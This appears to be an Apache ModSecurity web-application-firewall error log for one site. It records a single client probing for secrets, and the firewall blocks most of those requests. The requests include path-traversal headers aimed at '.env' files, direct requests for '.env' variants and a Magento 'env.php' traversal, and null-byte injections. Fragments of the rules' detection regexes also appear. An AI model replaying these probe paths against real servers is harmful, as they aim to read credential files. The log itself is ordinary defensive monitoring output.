[Tue May 12 04:50:50.635017 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKViggpmE1yW0glLdghkwAAAMw"]
[Tue May 12 04:50:50.670855 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghlAAAAMw"]
[Tue May 12 04:50:50.670920 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghlAAAAMw"]
[Tue May 12 04:50:50.670948 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghlAAAAMw"]
[Tue May 12 04:50:50.671160 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghlAAAAMw"]
[Tue May 12 04:50:50.671189 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghlAAAAMw"]
[Tue May 12 04:50:50.671594 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghlAAAAMw"]
[Tue May 12 04:50:50.674536 2026] [security2:error] [pid 1825179:tid 1825202] [client 93.123.109.165:29804] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVidr1yOh9TvizeziSpgAAAEQ"]
[Tue May 12 04:50:50.688932 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKViggpmE1yW0glLdghlAAAAMw"]
[Tue May 12 04:50:50.981419 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghmAAAAMw"]
[Tue May 12 04:50:50.981465 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghmAAAAMw"]
[Tue May 12 04:50:50.981491 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghmAAAAMw"]
[Tue May 12 04:50:50.982076 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/health"] [unique_id "agKViggpmE1yW0glLdghmAAAAMw"]
[Tue May 12 04:50:51.010473 2026] [security2:error] [pid 1730207:tid 1730231] [client 93.123.109.165:29944] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agKVizue9Sp-pIv_Bb634wAAAVY"]
[Tue May 12 04:50:51.010618 2026] [security2:error] [pid 1730207:tid 1730231] [client 93.123.109.165:29944] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agKVizue9Sp-pIv_Bb634wAAAVY"]
[Tue May 12 04:50:51.668359 2026] [security2:error] [pid 1730207:tid 1730231] [client 93.123.109.165:29944] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVizue9Sp-pIv_Bb634wAAAVY"]
[Tue May 12 04:50:51.714910 2026] [security2:error] [pid 1825179:tid 1825211] [client 93.123.109.165:29898] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.example"] [unique_id "agKVi9r1yOh9TvizeziSsAAAAE0"]
[Tue May 12 04:50:51.715145 2026] [security2:error] [pid 1825179:tid 1825211] [client 93.123.109.165:29898] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.example"] [unique_id "agKVi9r1yOh9TvizeziSsAAAAE0"]
[Tue May 12 04:50:52.347947 2026] [security2:error] [pid 1820198:tid 1820216] [client 93.123.109.165:29936] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVjM1tk6y7yBJLpJos7gAAAJA"]
[Tue May 12 04:50:52.348174 2026] [security2:error] [pid 1820198:tid 1820216] [client 93.123.109.165:29936] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVjM1tk6y7yBJLpJos7gAAAJA"]
[Tue May 12 04:50:52.596794 2026] [security2:error] [pid 1825287:tid 1825317] [client 93.123.109.165:29856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKViggpmE1yW0glLdghmAAAAMw"]
[Tue May 12 04:50:52.643878 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKVjAgpmE1yW0glLdghnAAAAMg"], referer: https://tct-telecom.fr/health?X-App-Env=%00
[Tue May 12 04:50:52.643939 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKVjAgpmE1yW0glLdghnAAAAMg"], referer: https://tct-telecom.fr/health?X-App-Env=%00
[Tue May 12 04:50:52.644334 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 8)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKVjAgpmE1yW0glLdghnAAAAMg"], referer: https://tct-telecom.fr/health?X-App-Env=%00
[Tue May 12 04:50:52.763498 2026] [security2:error] [pid 1825179:tid 1825211] [client 93.123.109.165:29898] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVi9r1yOh9TvizeziSsAAAAE0"]
[Tue May 12 04:50:52.808282 2026] [security2:error] [pid 1730207:tid 1730224] [client 93.123.109.165:29972] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/app/.env"] [unique_id "agKVjDue9Sp-pIv_Bb635gAAAU8"]
[Tue May 12 04:50:52.808484 2026] [security2:error] [pid 1730207:tid 1730224] [client 93.123.109.165:29972] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/.env"] [unique_id "agKVjDue9Sp-pIv_Bb635gAAAU8"]
[Tue May 12 04:50:52.854925 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVjAgpmE1yW0glLdghnAAAAMg"], referer: https://tct-telecom.fr/health?X-App-Env=%00
[Tue May 12 04:50:52.892564 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghngAAAMg"]
[Tue May 12 04:50:52.892608 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghngAAAMg"]
[Tue May 12 04:50:52.892633 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghngAAAMg"]
[Tue May 12 04:50:52.892814 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghngAAAMg"]
[Tue May 12 04:50:52.892866 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghngAAAMg"]
[Tue May 12 04:50:52.892907 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghngAAAMg"]
[Tue May 12 04:50:52.893276 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghngAAAMg"]
[Tue May 12 04:50:52.909916 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVjAgpmE1yW0glLdghngAAAMg"]
[Tue May 12 04:50:52.950486 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghnwAAAMg"]
[Tue May 12 04:50:52.950538 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghnwAAAMg"]
